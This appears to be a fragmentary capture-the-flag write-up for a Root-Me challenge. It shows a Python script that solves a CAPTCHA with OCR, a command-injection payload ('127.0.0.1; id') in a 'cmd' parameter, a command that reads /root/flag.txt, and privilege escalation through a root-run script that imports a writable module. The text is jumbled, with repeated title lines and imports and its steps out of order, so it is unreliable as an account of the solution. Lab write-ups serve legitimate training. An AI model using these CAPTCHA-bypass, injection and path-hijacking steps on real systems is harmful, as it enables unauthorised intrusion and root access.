Captcha Me If You Can Root Me -

import pytesseract from PIL import Image import requests s = requests.Session() resp = s.get("http://challenge/captcha") with open("cap.png", "wb") as f: f.write(resp.content) text = pytesseract.image_to_string(Image.open("cap.png")) Solved CAPTCHA → accessed /exec endpoint. Parameter cmd vulnerable:

import os os.system("cat /root/flag.txt") ✅ RM{...} captured. captcha me if you can root me

CAPTCHA without rate-limiting + hidden command injection = game over. import pytesseract from PIL import Image import requests

🎯 Never trust user input, even behind a CAPTCHA. captcha me if you can root me

Script imports a writable module → path hijacking:

127.0.0.1; id Got uid=www-data sudo -l → user can run /usr/bin/python3 /opt/script.py as root.

Just solved on Root-Me! Automated CAPTCHA solving + privilege escalation = root.